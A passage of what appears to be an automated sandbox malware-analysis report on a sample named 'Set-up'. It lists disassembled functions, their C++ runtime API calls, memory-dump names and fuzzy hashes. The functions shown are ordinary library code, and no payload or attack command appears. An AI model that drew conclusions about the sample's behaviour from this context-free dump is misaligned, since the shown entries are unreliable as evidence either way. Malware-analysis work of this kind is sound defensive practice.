                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 8901376cf1af67e06f03cb4ca5bb38408a2616ae969742a2ef0ea62bbf7ddfda
                                                                                              • Instruction ID: 9b5ee28eddb7940ba4bc6464ecb40bb800179e05e334c39b1f367897178d8a20
                                                                                              • Opcode Fuzzy Hash: 8901376cf1af67e06f03cb4ca5bb38408a2616ae969742a2ef0ea62bbf7ddfda
                                                                                              • Instruction Fuzzy Hash: FAE06578926214CBC724DFB4C14268CBAF0AF54754F50C82EA09AAB340EB7C9B40DF60
                                                                                              Function 6BC25095 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2509C
                                                                                              • ??0_Locinfo@std@@QAE@PBD@Z.MSVCP100(6BC12DD8,00000028), ref: 6BC250BE
                                                                                                • Part of subcall function 6BC1B672: __EH_prolog3.LIBCMT ref: 6BC1B679
                                                                                                • Part of subcall function 6BC1B672: std::_Lockit::_Lockit.LIBCPMT(00000000,00000010), ref: 6BC1B686
                                                                                                • Part of subcall function 6BC1B672: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000000,00000010), ref: 6BC1B6BD
                                                                                                • Part of subcall function 6BC1B672: _CxxThrowException.MSVCR100 ref: 6BC1B6D3
                                                                                                • Part of subcall function 6BC1B672: ?_Locinfo_ctor@_Locinfo@std@@SAXPAV12@PBD@Z.MSVCP100(?,?,00000000,00000010), ref: 6BC1B6DC
                                                                                              • _Getcvt.MSVCP100(00000028), ref: 6BC250C3
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_handle_func.MSVCR100 ref: 6BC3AD50
                                                                                                • Part of subcall function 6BC3AD4D: ___lc_codepage_func.MSVCR100 ref: 6BC3AD59
                                                                                              • ??1_Locinfo@std@@QAE@XZ.MSVCP100(00000028), ref: 6BC250D1
                                                                                                • Part of subcall function 6BC1B776: __EH_prolog3.LIBCMT ref: 6BC1B77D
                                                                                                • Part of subcall function 6BC1B776: ?_Locinfo_dtor@_Locinfo@std@@SAXPAV12@@Z.MSVCP100(?,00000004), ref: 6BC1B78F
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7A3
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7B2
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7C1
                                                                                                • Part of subcall function 6BC1B776: free.MSVCR100 ref: 6BC1B7D0
                                                                                                • Part of subcall function 6BC1B776: ??1_Lockit@std@@QAE@XZ.MSVCP100(?,?,?,?,?,?,?,00000004), ref: 6BC1B7DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locinfo@std@@free$H_prolog3$??1_$??0_??0exception@std@@ExceptionGetcvtLocinfo_ctor@_Locinfo_dtor@_LockitLockit::_Lockit@std@@ThrowV12@V12@@___lc_codepage_func___lc_handle_funcstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 3604942003-0
                                                                                              • Opcode ID: 28b23ce989521eaa6b6b22685caee28199c661138e878979650486b9ed56af1a
                                                                                              • Instruction ID: f86de13630a15624cc61f6939faf973d72061d3bed14c5b5479c7bac845d98af
                                                                                              • Opcode Fuzzy Hash: 28b23ce989521eaa6b6b22685caee28199c661138e878979650486b9ed56af1a
                                                                                              • Instruction Fuzzy Hash: 02E06578926214CBC724DFB4D14268CBAF0AF54714F50C82EA099AB340EB7C9B40DF60
                                                                                              Function 6BC20C75 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __iob_func$fputcfputs
                                                                                              • String ID:
                                                                                              • API String ID: 1052049658-0
                                                                                              • Opcode ID: 0fe25088b33a9c717a7b5571199ac50d96189a04d47b9bdf3095c9202ee313b2
                                                                                              • Instruction ID: eeb988eca13e2097d53c82a6314cd0437aa9f8cc3a0beffce1b0d575ef161f68
                                                                                              • Opcode Fuzzy Hash: 0fe25088b33a9c717a7b5571199ac50d96189a04d47b9bdf3095c9202ee313b2
                                                                                              • Instruction Fuzzy Hash: 96D05E72400179AFFB002B1DCC0BBA67B3CFF123A7F948061F815E6150DA25EE118AD9
                                                                                              Function 6BC21D07 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3_fwrite
                                                                                              • String ID:
                                                                                              • API String ID: 4175271702-3916222277
                                                                                              • Opcode ID: d59b666af70c4eca1c815b1d326e5ccb570864f5ff3e3924c89bce3704d4bc74
                                                                                              • Instruction ID: 5e6b4ad2a9d3a4ab19079d689b9d9635ee63b3a5f93bdd021c0b7fc966119989
                                                                                              • Opcode Fuzzy Hash: d59b666af70c4eca1c815b1d326e5ccb570864f5ff3e3924c89bce3704d4bc74
                                                                                              • Instruction Fuzzy Hash: 9B41D231D24229DFCB21CFADC8809DEB7B5FF49710F10452AE951A7280F77AA644CB50
                                                                                              Function 6BC309C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position), ref: 6BC309E2
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                                • Part of subcall function 6BC2A795: ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long), ref: 6BC2A7AB
                                                                                              • memcpy.MSVCR100(?,?,?), ref: 6BC30A3D
                                                                                              Strings
                                                                                              • invalid string position, xrefs: 6BC309DD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                              • String ID: invalid string position
                                                                                              • API String ID: 3077978391-1799206989
                                                                                              • Opcode ID: 51d8f00378ef1fc51f70cc5b2266414fd857f1075cedbae837c866289efd3cc4
                                                                                              • Instruction ID: 7f370e7640edd267996f5e11a5c58ffbcad55ac2a8dd4dc7729d29a25a8f829c
                                                                                              • Opcode Fuzzy Hash: 51d8f00378ef1fc51f70cc5b2266414fd857f1075cedbae837c866289efd3cc4
                                                                                              • Instruction Fuzzy Hash: 3511B933334224DBCB208E6CE881B5A73B9FB85715B500529F8558B244F738EB18C7A1
                                                                                              Function 6BC30854 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position,?,?,?,?,6BC30924,?,?,?,?,?,?,?,6BC31AA1,?,00000000), ref: 6BC30870
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                                • Part of subcall function 6BC217B0: ?_Xlength_error@std@@YAXPBD@Z.MSVCP100(string too long,?,?,6BC30934,?,00000000,?,?,?,?,?,6BC31AA1,?,00000000,00000000), ref: 6BC217C3
                                                                                              • memcpy.MSVCR100(?,?,00000000,00000000,00000000,?,?,?,?,6BC30924,?,?,?,?,?,?), ref: 6BC308CB
                                                                                              Strings
                                                                                              • invalid string position, xrefs: 6BC3086B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xlength_error@std@@Xout_of_range@std@@memcpy
                                                                                              • String ID: invalid string position
                                                                                              • API String ID: 3077978391-1799206989
                                                                                              • Opcode ID: fb0dbf8c9b4e5f93a1bc555e5e329ce1b14cabffb1dfc2622be5330562387b02
                                                                                              • Instruction ID: 4e8226b507ef68bd7b353f455af245bac1166eefbab7aedad73faeace6ec80a8
                                                                                              • Opcode Fuzzy Hash: fb0dbf8c9b4e5f93a1bc555e5e329ce1b14cabffb1dfc2622be5330562387b02
                                                                                              • Instruction Fuzzy Hash: FA11B632724220ABDB249E5DC840B5AB7B5FB81B54F50052EE9518B281FBB9DB44C7E2
                                                                                              Function 6BC18269 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0invalid_link_target@Concurrency@@QAE@PBD@Z.MSVCR100(_Link), ref: 6BC18F9F
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8B8), ref: 6BC18FAE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_link_target@Concurrency@@ExceptionThrow
                                                                                              • String ID: _Link
                                                                                              • API String ID: 3916662256-3418048212
                                                                                              • Opcode ID: 610150a0a438655015eb3d3854e0b5b779d2fab1a112f7861c5144e640640cbb
                                                                                              • Instruction ID: df1e772952d2ec6a631d6b18221426b17abc79f9003f31a0b056ac4b829829c9
                                                                                              • Opcode Fuzzy Hash: 610150a0a438655015eb3d3854e0b5b779d2fab1a112f7861c5144e640640cbb
                                                                                              • Instruction Fuzzy Hash: 2A11233651C1199BDB04CF59C890DAEB7A6FB80310B518068E92ABB150FB38FB46D6A0
                                                                                              Function 6BC25E2F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP100(invalid string position), ref: 6BC25E47
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20D79
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4CACC), ref: 6BC20D8F
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DAF
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC484B4), ref: 6BC20DC5
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC20DE5
                                                                                                • Part of subcall function 6BC20D64: _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC20DFB
                                                                                                • Part of subcall function 6BC20D64: ??0exception@std@@QAE@ABV01@@Z.MSVCR100(?,?,?,?,6BC4C9D0), ref: 6BC20E11
                                                                                              • memmove.MSVCR100(?,?,?), ref: 6BC25E85
                                                                                              Strings
                                                                                              • invalid string position, xrefs: 6BC25E42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$ExceptionThrow$V01@@Xout_of_range@std@@memmove
                                                                                              • String ID: invalid string position
                                                                                              • API String ID: 3646397376-1799206989
                                                                                              • Opcode ID: 57b9e7a9f1e3a40b875876ba53317ab947f8e2139449c56ba0f3f3ef39372c82
                                                                                              • Instruction ID: 09d3e41ef273438da73f473356c0c62ff2029d03635d3f9c0c0d96ed2d3aa2c2
                                                                                              • Opcode Fuzzy Hash: 57b9e7a9f1e3a40b875876ba53317ab947f8e2139449c56ba0f3f3ef39372c82
                                                                                              • Instruction Fuzzy Hash: 411184327246149BC320CEACD88085BB7BAFFC5B54324492AD595C7608FB78EA49C7A1
                                                                                              Function 6BC18094 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(sync_send called without registering a callback), ref: 6BC180B3
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C880), ref: 6BC180C3
                                                                                                • Part of subcall function 6BC18D62: ??0_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?), ref: 6BC18D6E
                                                                                                • Part of subcall function 6BC18D62: ??1_Scoped_lock@_NonReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC18D88
                                                                                              Strings
                                                                                              • sync_send called without registering a callback, xrefs: 6BC180AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0invalid_operation@??1_ExceptionThrowV123@@
                                                                                              • String ID: sync_send called without registering a callback
                                                                                              • API String ID: 427308038-4178601950
                                                                                              • Opcode ID: 5abb0e8fd6aa59e21e5abdd1d6f3a9ae7333b745804096aedffe641ea1327c6c
                                                                                              • Instruction ID: e191938bffc7607a686ffd65168e356a9cfc20cc9448c0f2c6b6eb196201f8e3
                                                                                              • Opcode Fuzzy Hash: 5abb0e8fd6aa59e21e5abdd1d6f3a9ae7333b745804096aedffe641ea1327c6c
                                                                                              • Instruction Fuzzy Hash: BE11A53221D2048BC708DF28C885E5677A8FF45321F5502BDE9669B191FB39DB05DAE4
                                                                                              Function 6BC1ADE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1AE09
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1AE1F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 2684170311-988830941
                                                                                              • Opcode ID: b63ae7ddab3f5f985b84ce0e90dfb77d0084760d5c12b6ad32b48c6aea3f4e6c
                                                                                              • Instruction ID: 3b1dd0899f16f2c8675d5e633c9ef12493855a12e8176eeb61592aa220fda3bc
                                                                                              • Opcode Fuzzy Hash: b63ae7ddab3f5f985b84ce0e90dfb77d0084760d5c12b6ad32b48c6aea3f4e6c
                                                                                              • Instruction Fuzzy Hash: ACF05E7A910528BFC710DF99D445CCEBBBCEF993507008066FA16E7210EB78A709CBA1
                                                                                              Function 6BC3A883 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _create_locale_ui64toa_s
                                                                                              • String ID: .
                                                                                              • API String ID: 194611966-248832578
                                                                                              • Opcode ID: 829a08be4b91ec2a3e888b7ab25df39b3c948f0d73fee2413bc7e7968c648f42
                                                                                              • Instruction ID: 134465952b43997562a13b5e360cfabe37450f6f9093549478b6495f9f9dadad
                                                                                              • Opcode Fuzzy Hash: 829a08be4b91ec2a3e888b7ab25df39b3c948f0d73fee2413bc7e7968c648f42
                                                                                              • Instruction Fuzzy Hash: 6FE06D30E4434CAFDF00DBA4C94AFADBBF8EB59705F500064E901A6280EA70EB049B26
                                                                                              Function 6BC19A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC19A7C
                                                                                              • _CxxThrowException.MSVCR100(6BC123F4,6BC4C848), ref: 6BC19A92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 2684170311-988830941
                                                                                              • Opcode ID: eccdc0afcffe60ff6cf0e73b9c99fdc10ef32131106558d6260d681944af10bb
                                                                                              • Instruction ID: 379fc4fa2a8913b23b4d06909eaa18f1f69b779bfa588adba16c1dc8960eb130
                                                                                              • Opcode Fuzzy Hash: eccdc0afcffe60ff6cf0e73b9c99fdc10ef32131106558d6260d681944af10bb
                                                                                              • Instruction Fuzzy Hash: CDE0E57581410CBFCB00DF99D405ACD7BB8FB54314F40C0A5AA15AA110E7789749DF61
                                                                                              Function 6BC1A9E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000002), ref: 6BC1A9F7
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1AA0D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@ExceptionThrow
                                                                                              • String ID: _PSource
                                                                                              • API String ID: 2684170311-588581970
                                                                                              • Opcode ID: 19fcd0016e4f595670eb66850d3acf506b85e1c01eb01e68e830fa05ba80392d
                                                                                              • Instruction ID: 554a4a1804be163c6e41c0f2ba9668349369b1e48398cb26af7a909c9c40fb90
                                                                                              • Opcode Fuzzy Hash: 19fcd0016e4f595670eb66850d3acf506b85e1c01eb01e68e830fa05ba80392d
                                                                                              • Instruction Fuzzy Hash: 49D05EB582022CEB8B00EBDDC8469EFBB7CFA84200F9009159220A2100FB385708DBB1
                                                                                              Function 6BC16DD1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0invalid_link_target@Concurrency@@QAE@PBD@Z.MSVCR100(_Link), ref: 6BC16DEE
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C8B8), ref: 6BC16DFD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_link_target@Concurrency@@ExceptionThrow
                                                                                              • String ID: _Link
                                                                                              • API String ID: 3916662256-3418048212
                                                                                              • Opcode ID: 42d0ae7ba9a3d4f246fd22417127717a4a5793992a7ffbccf1216362c6d3a1f7
                                                                                              • Instruction ID: 50a997e8fbaeb6b794ecf594226a82ddcf4ce17c119f8dbc2a243e0993ce4438
                                                                                              • Opcode Fuzzy Hash: 42d0ae7ba9a3d4f246fd22417127717a4a5793992a7ffbccf1216362c6d3a1f7
                                                                                              • Instruction Fuzzy Hash: 16E0C231910208BBDB00DBA4C505F8EBBF8EF51304F90C175A525A7040FB78D709C7A0
                                                                                              Function 6BC16D9A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links), ref: 6BC16DB6
                                                                                              • _CxxThrowException.MSVCR100(6BC1AA73,6BC4C880), ref: 6BC16DC5
                                                                                              Strings
